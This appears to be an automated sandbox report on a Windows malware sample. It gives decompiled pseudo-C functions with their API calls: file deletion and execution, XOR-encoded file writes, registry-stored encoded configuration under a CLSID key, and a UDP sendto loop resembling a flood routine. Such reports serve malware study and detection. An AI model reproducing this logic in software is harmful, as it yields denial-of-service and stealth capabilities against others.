                                                            0x04634171
                                                            0x00000000
                                                            0x00000000
                                                            0x046341f7
                                                            0x046341fa
                                                            0x046341fd
                                                            0x04634202
                                                            0x04634203
                                                            0x04634207
                                                            0x00000000
                                                            0x00000000
                                                            0x046341c1
                                                            0x046341c6
                                                            0x00000000
                                                            0x00000000
                                                            0x046341cd
                                                            0x046341d1
                                                            0x046341d7
                                                            0x046341dd
                                                            0x046341e3
                                                            0x04634176
                                                            0x04634176
                                                            0x04634177
                                                            0x0463417a
                                                            0x0463417e
                                                            0x04634180
                                                            0x04634182
                                                            0x04634183
                                                            0x04634188
                                                            0x04634189
                                                            0x0463418d
                                                            0x00000000
                                                            0x00000000
                                                            0x04634231
                                                            0x00000000
                                                            0x00000000
                                                            0x04634250
                                                            0x04634233
                                                            0x04634237
                                                            0x04634242
                                                            0x04634248
                                                            0x04634249
                                                            0x0463424d
                                                            0x00000000
                                                            0x00000000
                                                            0x04634258
                                                            0x00000000
                                                            0x00000000
                                                            0x0463414f
                                                            0x00000000

                                                            APIs
                                                            • DeleteFileW.KERNEL32(?), ref: 0463416B
                                                            • lstrlenW.KERNEL32(?,?,?,?,?), ref: 046341D1
                                                            • MoveFileW.KERNEL32(?,00000001), ref: 046341DD
                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 04634242
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$DeleteExecuteMoveShelllstrlen
                                                            • String ID: open$r
                                                            • API String ID: 69973834-2967530574
                                                            • Opcode ID: 374693319a2492ac3beada1b4ac6bac3cdb85167828878f8fd3f69e736d34f14
                                                            • Instruction ID: 5082011bda1d5a1434730115396c0bdc9e90fabddba84bfae3b7e13121f88e40
                                                            • Opcode Fuzzy Hash: 374693319a2492ac3beada1b4ac6bac3cdb85167828878f8fd3f69e736d34f14
                                                            • Instruction Fuzzy Hash: BC31B63761815996D300EF98F844FAAF39CEBD9222F00836BE904C7141FA66F56487E5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			E0463B1A0(intOrPtr* __ecx) {
                                                            				void* _v8;
                                                            				long _v12;
                                                            				intOrPtr _v16;
                                                            				long _v20;
                                                            				void* _v24;
                                                            				void* __esi;
                                                            				intOrPtr _t21;
                                                            				intOrPtr _t25;
                                                            				signed char _t31;
                                                            				signed int _t36;
                                                            				void* _t37;
                                                            				void* _t41;
                                                            				long _t42;
                                                            				intOrPtr* _t46;
                                                            				void* _t49;
                                                            				void* _t51;
                                                            				void* _t53;
                                                            				void* _t54;
                                                            				void* _t55;
                                                            				intOrPtr* _t56;
                                                            				void* _t57;
                                                            				void* _t58;
                                                            				void* _t59;
                                                            				void* _t60;
                                                            				void* _t62;
                                                            
                                                            				_t21 =  *0x4687adc; // 0x0
                                                            				_t56 = __ecx;
                                                            				_t41 = CreateFileW(_t21 + 0x20e, 0x40000000, 2, 0, 4, 0x80, 0);
                                                            				_v20 = 0;
                                                            				_v24 = _t41;
                                                            				if(GetFileSize(_t41, 0) < 0x3200000) {
                                                            					SetFilePointer(_t41, 0, 0, 2);
                                                            				}
                                                            				_t46 = _t56;
                                                            				_t54 = _t46 + 2;
                                                            				do {
                                                            					_t25 =  *_t46;
                                                            					_t46 = _t46 + 2;
                                                            					_t68 = _t25;
                                                            				} while (_t25 != 0);
                                                            				_t48 = _t46 - _t54 >> 1;
                                                            				_t42 = (_t46 - _t54 >> 1) + (_t46 - _t54 >> 1);
                                                            				_push(_t42);
                                                            				_v12 = _t42;
                                                            				_t60 = L04655B55(_t48, _t59, _t68);
                                                            				_t55 = 0;
                                                            				_v8 = _t60;
                                                            				if(_t42 > 0) {
                                                            					if(_t42 >= 0x20) {
                                                            						_t8 = _t60 - 1; // -1
                                                            						_t51 = _t8 + _t42;
                                                            						if(_t60 > _t56 - 1 + _t42 || _t51 < _t56) {
                                                            							_t36 = _t42 & 0x8000001f;
                                                            							if(_t36 < 0) {
                                                            								_t36 = (_t36 - 0x00000001 | 0xffffffe0) + 1;
                                                            							}
                                                            							asm("movaps xmm1, [0x467f990]");
                                                            							_t53 = _t42 - _t36;
                                                            							_t37 = _t60;
                                                            							_v16 = _t56 - _t60;
                                                            							_t42 = _v12;
                                                            							do {
                                                            								asm("movups xmm0, [esi+eax]");
                                                            								_t37 = _t37 + 0x20;
                                                            								asm("pxor xmm0, xmm1");
                                                            								asm("movups [eax-0x20], xmm0");
                                                            								asm("movups xmm0, [edi+edx+0x10]");
                                                            								_t55 = _t55 + 0x20;
                                                            								asm("pxor xmm0, xmm1");
                                                            								asm("movups [eax-0x10], xmm0");
                                                            							} while (_t55 < _t53);
                                                            							_t60 = _v8;
                                                            						}
                                                            					}
                                                            					if(_t55 < _t42) {
                                                            						_t49 = _t55 + _t60;
                                                            						_t58 = _t56 - _t60;
                                                            						_t62 = _t42 - _t55;
                                                            						do {
                                                            							_t31 =  *((intOrPtr*)(_t49 + _t58));
                                                            							_t49 = _t49 + 1;
                                                            							 *(_t49 - 1) = _t31 ^ 0x00000058;
                                                            							_t62 = _t62 - 1;
                                                            						} while (_t62 != 0);
                                                            						_t60 = _v8;
                                                            					}
                                                            				}
                                                            				_t57 = _v24;
                                                            				WriteFile(_t57, _t60, _t42,  &_v20, 0);
                                                            				CloseHandle(_t57);
                                                            				return L04655B0F(_t60);
                                                            			}




























                                                            0x0463b1a6
                                                            0x0463b1c5
                                                            0x0463b1ce
                                                            0x0463b1d0
                                                            0x0463b1da
                                                            0x0463b1e8
                                                            0x0463b1f1
                                                            0x0463b1f1
                                                            0x0463b1f7
                                                            0x0463b1f9
                                                            0x0463b200
                                                            0x0463b200
                                                            0x0463b203
                                                            0x0463b206
                                                            0x0463b206
                                                            0x0463b20d
                                                            0x0463b20f
                                                            0x0463b212
                                                            0x0463b213
                                                            0x0463b21e
                                                            0x0463b220
                                                            0x0463b222
                                                            0x0463b227
                                                            0x0463b230
                                                            0x0463b235
                                                            0x0463b23a
                                                            0x0463b23e
                                                            0x0463b246
                                                            0x0463b24b
                                                            0x0463b251
                                                            0x0463b251
                                                            0x0463b252
                                                            0x0463b25b
                                                            0x0463b261
                                                            0x0463b263
                                                            0x0463b266
                                                            0x0463b270
                                                            0x0463b270
                                                            0x0463b274
                                                            0x0463b277
                                                            0x0463b27b
                                                            0x0463b27f
                                                            0x0463b284
                                                            0x0463b287
                                                            0x0463b28b
                                                            0x0463b28f
                                                            0x0463b293
                                                            0x0463b293
                                                            0x0463b23e
                                                            0x0463b298
                                                            0x0463b29a
                                                            0x0463b29d
                                                            0x0463b2a1
                                                            0x0463b2a3
                                                            0x0463b2a3
                                                            0x0463b2a6
                                                            0x0463b2ab
                                                            0x0463b2ae
                                                            0x0463b2ae
                                                            0x0463b2b3
                                                            0x0463b2b3
                                                            0x0463b298
                                                            0x0463b2b6
                                                            0x0463b2c2
                                                            0x0463b2c9
                                                            0x0463b2de

                                                            APIs
                                                            • CreateFileW.KERNEL32(-0000020E,40000000,00000002,00000000,00000004,00000080,00000000), ref: 0463B1C8
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0463B1DD
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0463B1F1
                                                            • WriteFile.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 0463B2C2
                                                            • CloseHandle.KERNEL32(?), ref: 0463B2C9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandlePointerSizeWrite
                                                            • String ID:
                                                            • API String ID: 1886887421-3916222277
                                                            • Opcode ID: 84555dac32ecbd5c0f3210d882d2cb29583d4ea6676e45a3d22b2cc37474e1e2
                                                            • Instruction ID: 023d12e557edd9c972a5367755ef72c152f5befbd8e6c1f554729823be9d408c
                                                            • Opcode Fuzzy Hash: 84555dac32ecbd5c0f3210d882d2cb29583d4ea6676e45a3d22b2cc37474e1e2
                                                            • Instruction Fuzzy Hash: 6D412571A00249ABDB14CF78CC89BBDB7A4EF88719F15436CE909A7282FB707945C750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 63%
                                                            			E046525A0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
                                                            				void* __esi;
                                                            				void* _t38;
                                                            				void* _t44;
                                                            				void* _t53;
                                                            				void* _t55;
                                                            				LONG* _t68;
                                                            				void* _t69;
                                                            				intOrPtr* _t77;
                                                            				void* _t80;
                                                            				LONG* _t81;
                                                            
                                                            				_t62 = __ebx;
                                                            				_t77 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 0x54)) == 3) {
                                                            					L12:
                                                            					 *((intOrPtr*)(_t77 + 0x58)) = 1;
                                                            					SetLastError(0x139f);
                                                            					__eflags = 0;
                                                            					return 0;
                                                            				} else {
                                                            					E0464EC90(__ecx + 0x174);
                                                            					_t38 =  *((intOrPtr*)( *__ecx + 0x2c))();
                                                            					_t85 = _t38;
                                                            					if(_t38 == 0) {
                                                            						 *(__ecx + 0x174) = 0;
                                                            						goto L12;
                                                            					} else {
                                                            						 *((intOrPtr*)(__ecx + 0x54)) = 2;
                                                            						 *(__ecx + 0x174) = 0;
                                                            						E04652750(__ecx, _t85);
                                                            						L04653350(__ebx, _t77, _t77, _t80);
                                                            						_t68 = _t77;
                                                            						L046533C0(__ebx, _t68, _t77, _t80);
                                                            						if( *((intOrPtr*)(_t77 + 0x23c)) != 0) {
                                                            							_push(0x80004005);
                                                            							E04637AC0();
                                                            							goto L14;
                                                            						} else {
                                                            							_t69 = _t77 + 0x178;
                                                            							if( *((intOrPtr*)(_t77 + 0x17c)) != 0) {
                                                            								E04640410(_t69, _t80);
                                                            							}
                                                            							 *((intOrPtr*)( *_t77 + 0xf4))();
                                                            							E04654CF0(_t77 + 0x2b4, _t77);
                                                            							_t68 = _t77 + 0x378;
                                                            							E04655860(_t68,  *((intOrPtr*)(_t77 + 0x1c)), 1);
                                                            							if( *((intOrPtr*)(_t77 + 0x37c)) != 0) {
                                                            								L14:
                                                            								_push(0x80004005);
                                                            								E04637AC0();
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								asm("int3");
                                                            								_push(_t80);
                                                            								_t81 = _t68;
                                                            								_t44 =  *(_t81 + 0x84);
                                                            								__eflags = _t44;
                                                            								if(_t44 != 0) {
                                                            									HeapDestroy(_t44);
                                                            								}
                                                            								 *(_t81 + 0x84) = HeapCreate( *(_t81 + 0x88),  *(_t81 + 0x8c),  *(_t81 + 0x90));
                                                            								asm("xorps xmm0, xmm0");
                                                            								asm("movups [esi+0x5c], xmm0");
                                                            								asm("movq [esi+0x6c], xmm0");
                                                            								 *(_t81 + 0x74) = 0;
                                                            								 *(_t81 + 0x40) = 0;
                                                            								 *(_t81 + 0x44) = 0;
                                                            								 *((intOrPtr*)(_t81 + 0x54)) = 3;
                                                            								return SetEvent( *(_t81 + 0x3c));
                                                            							} else {
                                                            								E046404A0(_t62, _t77 + 0xb0);
                                                            								_t53 =  *(_t77 + 0x94);
                                                            								if(_t53 != 0) {
                                                            									HeapDestroy(_t53);
                                                            								}
                                                            								 *(_t77 + 0x94) = HeapCreate( *(_t77 + 0x98),  *(_t77 + 0x9c),  *(_t77 + 0xa0));
                                                            								_t55 =  *(_t77 + 0x50);
                                                            								if(_t55 != 0) {
                                                            									CloseHandle(_t55);
                                                            									 *(_t77 + 0x50) = 0;
                                                            								}
                                                            								 *((intOrPtr*)( *_t77 + 0x120))();
                                                            								return 1;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}













                                                            0x046525a0
                                                            0x046525a2
                                                            0x046525a8
                                                            0x046526af
                                                            0x046526b4
                                                            0x046526bb
                                                            0x046526c2
                                                            0x046526c5
                                                            0x046525ae
                                                            0x046525b4
                                                            0x046525bd
                                                            0x046525c0
                                                            0x046525c2
                                                            0x046526a5
                                                            0x00000000
                                                            0x046525c8
                                                            0x046525c8
                                                            0x046525d1
                                                            0x046525db
                                                            0x046525e2
                                                            0x046525e7
                                                            0x046525e9
                                                            0x046525f5
                                                            0x046526c6
                                                            0x046526cb
                                                            0x00000000
                                                            0x046525fb
                                                            0x04652602
                                                            0x04652608
                                                            0x0465260a
                                                            0x0465260a
                                                            0x04652613
                                                            0x0465261f
                                                            0x04652627
                                                            0x0465262f
                                                            0x0465263e
                                                            0x046526d0
                                                            0x046526d0
                                                            0x046526d5
                                                            0x046526da
                                                            0x046526db
                                                            0x046526dc
                                                            0x046526dd
                                                            0x046526de
                                                            0x046526df
                                                            0x046526e0
                                                            0x046526e1
                                                            0x046526e3
                                                            0x046526e9
                                                            0x046526eb
                                                            0x046526ee
                                                            0x046526ee
                                                            0x0465270c
                                                            0x04652712
                                                            0x04652715
                                                            0x04652719
                                                            0x0465271e
                                                            0x04652728
                                                            0x0465272f
                                                            0x04652736
                                                            0x04652744
                                                            0x04652644
                                                            0x0465264a
                                                            0x0465264f
                                                            0x04652657
                                                            0x0465265a
                                                            0x0465265a
                                                            0x04652678
                                                            0x0465267e
                                                            0x04652683
                                                            0x04652686
                                                            0x0465268c
                                                            0x0465268c
                                                            0x04652697
                                                            0x046526a4
                                                            0x046526a4
                                                            0x0465263e
                                                            0x046525f5
                                                            0x046525c2

                                                            APIs
                                                            • SetLastError.KERNEL32(0000139F,?,00000000,0463F8B6), ref: 046526BB
                                                              • Part of subcall function 0464EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0464ECA5
                                                              • Part of subcall function 0464EC90: SwitchToThread.KERNEL32(?,?,00000000,0464E712,?,00000000,04638425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,046387F8), ref: 0464ECBD
                                                            • HeapDestroy.KERNEL32(?), ref: 0465265A
                                                            • HeapCreate.KERNEL32(?,?,?), ref: 04652672
                                                            • CloseHandle.KERNEL32(?), ref: 04652686
                                                            • HeapDestroy.KERNEL32(?,00000000,80004005,80004005), ref: 046526EE
                                                            • HeapCreate.KERNEL32(?,?,?,00000000,80004005,80004005), ref: 04652706
                                                            • SetEvent.KERNEL32(80004005), ref: 0465273D
                                                              • Part of subcall function 046533C0: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 046533F9
                                                              • Part of subcall function 046533C0: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF), ref: 0465344C
                                                              • Part of subcall function 046533C0: CloseHandle.KERNEL32(?,?,00000001,000000FF), ref: 04653463
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$CloseCreateDestroyHandle$CompareCompletionErrorEventExchangeInterlockedLastMultipleObjectsPostQueuedStatusSwitchThreadWait
                                                            • String ID:
                                                            • API String ID: 1858100233-0
                                                            • Opcode ID: 093a9432a2ba74193ebc5d64be34559342f31b90ec083be9cb7b7e02b4912606
                                                            • Instruction ID: 91602d9bff163ebaf71d4623462677848822b4e605dce2de31798a2b37d6ae61
                                                            • Opcode Fuzzy Hash: 093a9432a2ba74193ebc5d64be34559342f31b90ec083be9cb7b7e02b4912606
                                                            • Instruction Fuzzy Hash: CD415971300A42EFEB18AF30D858BAAF7A5FF54308F04411DE92A82251EF74B464CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E04633EF0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				intOrPtr _v20;
                                                            				signed int _v22;
                                                            				char _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				signed int _v36;
                                                            				signed int _t47;
                                                            				signed int _t51;
                                                            				long _t56;
                                                            				intOrPtr _t57;
                                                            				intOrPtr _t66;
                                                            				struct _CRITICAL_SECTION* _t78;
                                                            				intOrPtr _t81;
                                                            				signed int _t82;
                                                            
                                                            				_t47 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t47 ^ _t82;
                                                            				_t81 = _a4;
                                                            				_v24 = 2;
                                                            				_t67 =  *((intOrPtr*)(_t81 + 4));
                                                            				_v20 =  *((intOrPtr*)(_t67 + 0xc));
                                                            				_t51 =  *(_t67 + 0x10) & 0x0000ffff;
                                                            				__imp__#9(_t51);
                                                            				_v22 = _t51;
                                                            				__imp__#23(2, 2, 0);
                                                            				_t65 = _t51;
                                                            				_v36 = _t51;
                                                            				if( *((char*)(_t81 + 1)) != 0) {
                                                            					do {
                                                            						_v32 = 0;
                                                            						if( *((intOrPtr*)( *((intOrPtr*)(_t81 + 4)) + 0x24)) > 0) {
                                                            							do {
                                                            								_t66 =  *((intOrPtr*)(_t81 + 4));
                                                            								if( *((short*)(_t66 + 0x16)) != 3) {
                                                            									_t57 =  *((intOrPtr*)(_t66 + 0x1c));
                                                            									_v28 = _t57;
                                                            									if(_t57 !=  *((intOrPtr*)(_t66 + 0x18))) {
                                                            										_t79 =  *((intOrPtr*)(_t66 + 0x18));
                                                            										_t57 =  *((intOrPtr*)(_t66 + 0x18)) + E0465EF46(_t67) % ( *((intOrPtr*)(_t66 + 0x1c)) - _t79 + 1);
                                                            										goto L7;
                                                            									}
                                                            								} else {
                                                            									_t57 =  *((intOrPtr*)(_t66 + 0x34));
                                                            									L7:
                                                            									_v28 = _t57;
                                                            								}
                                                            								_t67 =  &_v24;
                                                            								_t65 = _v36;
                                                            								__imp__#20(_v36,  *((intOrPtr*)(_t66 + 0x3c)), _t57, 0,  &_v24, 0x10);
                                                            								if(_t57 != 0xffffffff) {
                                                            									goto L9;
                                                            								}
                                                            								goto L12;
                                                            								L9:
                                                            								if( *((intOrPtr*)( *((intOrPtr*)(_t81 + 4)) + 8)) != 0) {
                                                            									_t78 = _t81 + 0x3c;
                                                            									EnterCriticalSection(_t78);
                                                            									asm("cdq");
                                                            									 *((intOrPtr*)(_t81 + 0x18)) =  *((intOrPtr*)(_t81 + 0x18)) + _v28 + 0x2e;
                                                            									asm("adc [esi+0x1c], edx");
                                                            									 *((intOrPtr*)(_t81 + 0x10)) =  *((intOrPtr*)(_t81 + 0x10)) + 1;
                                                            									asm("adc dword [esi+0x14], 0x0");
                                                            									LeaveCriticalSection(_t78);
                                                            								}
                                                            								_t67 = _v32 + 1;
                                                            								_v32 = _t67;
                                                            							} while (_t67 <  *((intOrPtr*)( *((intOrPtr*)(_t81 + 4)) + 0x24)));
                                                            						}
                                                            						L12:
                                                            						_t56 =  *( *((intOrPtr*)(_t81 + 4)) + 0x28);
                                                            						if(_t56 != 0) {
                                                            							Sleep(_t56);
                                                            						}
                                                            					} while ( *((char*)(_t81 + 1)) != 0);
                                                            				}
                                                            				__imp__#3();
                                                            				return E04655AFE(_v8 ^ _t82, _t65);
                                                            			}


















                                                            0x04633ef6
                                                            0x04633efd
                                                            0x04633f02
                                                            0x04633f0a
                                                            0x04633f0e
                                                            0x04633f14
                                                            0x04633f17
                                                            0x04633f1c
                                                            0x04633f28
                                                            0x04633f2c
                                                            0x04633f36
                                                            0x04633f38
                                                            0x04633f3b
                                                            0x04633f42
                                                            0x04633f45
                                                            0x04633f50
                                                            0x04633f56
                                                            0x04633f56
                                                            0x04633f5e
                                                            0x04633f65
                                                            0x04633f68
                                                            0x04633f6e
                                                            0x04633f70
                                                            0x04633f82
                                                            0x00000000
                                                            0x04633f82
                                                            0x04633f60
                                                            0x04633f60
                                                            0x04633f85
                                                            0x04633f85
                                                            0x04633f85
                                                            0x04633f8a
                                                            0x04633f94
                                                            0x04633f98
                                                            0x04633fa1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04633fa3
                                                            0x04633faa
                                                            0x04633fac
                                                            0x04633fb0
                                                            0x04633fbc
                                                            0x04633fbd
                                                            0x04633fc1
                                                            0x04633fc4
                                                            0x04633fc8
                                                            0x04633fcc
                                                            0x04633fcc
                                                            0x04633fd8
                                                            0x04633fd9
                                                            0x04633fdc
                                                            0x04633f56
                                                            0x04633fe5
                                                            0x04633fe8
                                                            0x04633fed
                                                            0x04633ff0
                                                            0x04633ff0
                                                            0x04633ff6
                                                            0x04634000
                                                            0x04634002
                                                            0x04634019

                                                            APIs
                                                            • htons.WS2_32(?), ref: 04633F1C
                                                            • socket.WS2_32(00000002,00000002,00000000), ref: 04633F2C
                                                            • sendto.WS2_32(?,?,?,00000000,?,00000010), ref: 04633F98
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04633FB0
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04633FCC
                                                            • Sleep.KERNEL32(?), ref: 04633FF0
                                                            • closesocket.WS2_32(00000000), ref: 04634002
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeaveSleepclosesockethtonssendtosocket
                                                            • String ID:
                                                            • API String ID: 920770778-0
                                                            • Opcode ID: f7377446d5df5585c5810c085de23520b09482487f15a10bb51eb56d2f6b1e1a
                                                            • Instruction ID: d0daca4476914cf8892dfb5d8a365326b60f394ef759b924cad59f0dfcefa033
                                                            • Opcode Fuzzy Hash: f7377446d5df5585c5810c085de23520b09482487f15a10bb51eb56d2f6b1e1a
                                                            • Instruction Fuzzy Hash: BA415870A003059FDB28CF64C989B6AB7F5FF08711F40455DE9569B281EB74ED85CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E0464AE80(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				int _v616;
                                                            				int _v620;
                                                            				signed int _t25;
                                                            				int _t52;
                                                            				void* _t55;
                                                            				void* _t56;
                                                            				char* _t64;
                                                            				signed int _t65;
                                                            
                                                            				_t60 = __edi;
                                                            				_t25 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t25 ^ _t65;
                                                            				_t64 = __ecx;
                                                            				E0465DEA0(__edi, __ecx, 0, 0x190);
                                                            				_v616 = 0x190;
                                                            				E04646050(__ebx, L"Global",  &_v88, _t60, _t64);
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				E0465DEA0(0, _t64, 0, _v616);
                                                            				_v612 = 0;
                                                            				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612) != 0) {
                                                            					L8:
                                                            					return E04655AFE(_v8 ^ _t65);
                                                            				} else {
                                                            					RegQueryValueExW(_v612, "3", 0,  &_v620, _t64,  &_v616);
                                                            					_t62 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v612);
                                                            					_t71 =  ==  ? 1 : 0;
                                                            					if(( ==  ? 1 : 0) == 0) {
                                                            						goto L8;
                                                            					} else {
                                                            						_t52 = _v616;
                                                            						if(_t52 > 1) {
                                                            							_t55 = _t52 - 1;
                                                            							 *(_t55 + _t64) =  *(_t55 + _t64) ^  *_t64;
                                                            							_t56 = _t55 - 1;
                                                            							while(_t56 != 0) {
                                                            								 *(_t56 + _t64) =  *(_t56 + _t64) ^  *(_t56 +  &(_t64[1]));
                                                            								_t56 = _t56 - 1;
                                                            							}
                                                            							 *(_t56 + _t64) =  *(_t56 + _t64) ^ (_t56 + _t64)[0];
                                                            						}
                                                            						return E04655AFE(_v8 ^ _t65);
                                                            					}
                                                            				}
                                                            			}















                                                            0x0464ae80
                                                            0x0464ae89
                                                            0x0464ae90
                                                            0x0464ae9b
                                                            0x0464aea0
                                                            0x0464aea8
                                                            0x0464aeb7
                                                            0x0464aecc
                                                            0x0464aedc
                                                            0x0464aee4
                                                            0x0464af0b
                                                            0x0464af86
                                                            0x0464af98
                                                            0x0464af0d
                                                            0x0464af28
                                                            0x0464af3b
                                                            0x0464af3e
                                                            0x0464af44
                                                            0x0464af46
                                                            0x00000000
                                                            0x0464af48
                                                            0x0464af48
                                                            0x0464af50
                                                            0x0464af54
                                                            0x0464af55
                                                            0x0464af58
                                                            0x0464af5a
                                                            0x0464af64
                                                            0x0464af67
                                                            0x0464af67
                                                            0x0464af71
                                                            0x0464af71
                                                            0x0464af85
                                                            0x0464af85
                                                            0x0464af46

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 0464AECC
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0464AF03
                                                            • RegQueryValueExW.ADVAPI32(?,0467E120,00000000,?,?,?), ref: 0464AF28
                                                            • RegCloseKey.ADVAPI32(?), ref: 0464AF3E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue$wsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 3615287298-1865207932
                                                            • Opcode ID: 61152c37767772e82a330f340e47f9eb5593bb1614755cfc77be5c5f0e05fb34
                                                            • Instruction ID: d43188876c7699577a821851ad724f62b504fb12120125dab8c09c5662d03384
                                                            • Opcode Fuzzy Hash: 61152c37767772e82a330f340e47f9eb5593bb1614755cfc77be5c5f0e05fb34
                                                            • Instruction Fuzzy Hash: 2931EC716052586FDB20DF74DC48AEEBBBDEF85304F5001DDE5099A102F6325944CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E0464AFA0(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				int _v616;
                                                            				int _v620;
                                                            				signed int _t25;
                                                            				int _t52;
                                                            				void* _t55;
                                                            				void* _t56;
                                                            				char* _t64;
                                                            				signed int _t65;
                                                            
                                                            				_t60 = __edi;
                                                            				_t25 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t25 ^ _t65;
                                                            				_t64 = __ecx;
                                                            				E0465DEA0(__edi, __ecx, 0, 0x190);
                                                            				_v616 = 0x190;
                                                            				E04646050(__ebx, L"Global",  &_v88, _t60, _t64);
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				E0465DEA0(0, _t64, 0, _v616);
                                                            				_v612 = 0;
                                                            				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612) != 0) {
                                                            					L8:
                                                            					return E04655AFE(_v8 ^ _t65);
                                                            				} else {
                                                            					RegQueryValueExW(_v612, "2", 0,  &_v620, _t64,  &_v616);
                                                            					_t62 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v612);
                                                            					_t71 =  ==  ? 1 : 0;
                                                            					if(( ==  ? 1 : 0) == 0) {
                                                            						goto L8;
                                                            					} else {
                                                            						_t52 = _v616;
                                                            						if(_t52 > 1) {
                                                            							_t55 = _t52 - 1;
                                                            							 *(_t55 + _t64) =  *(_t55 + _t64) ^  *_t64;
                                                            							_t56 = _t55 - 1;
                                                            							while(_t56 != 0) {
                                                            								 *(_t56 + _t64) =  *(_t56 + _t64) ^  *(_t56 +  &(_t64[1]));
                                                            								_t56 = _t56 - 1;
                                                            							}
                                                            							 *(_t56 + _t64) =  *(_t56 + _t64) ^ (_t56 + _t64)[0];
                                                            						}
                                                            						return E04655AFE(_v8 ^ _t65);
                                                            					}
                                                            				}
                                                            			}















                                                            0x0464afa0
                                                            0x0464afa9
                                                            0x0464afb0
                                                            0x0464afbb
                                                            0x0464afc0
                                                            0x0464afc8
                                                            0x0464afd7
                                                            0x0464afec
                                                            0x0464affc
                                                            0x0464b004
                                                            0x0464b02b
                                                            0x0464b0a6
                                                            0x0464b0b8
                                                            0x0464b02d
                                                            0x0464b048
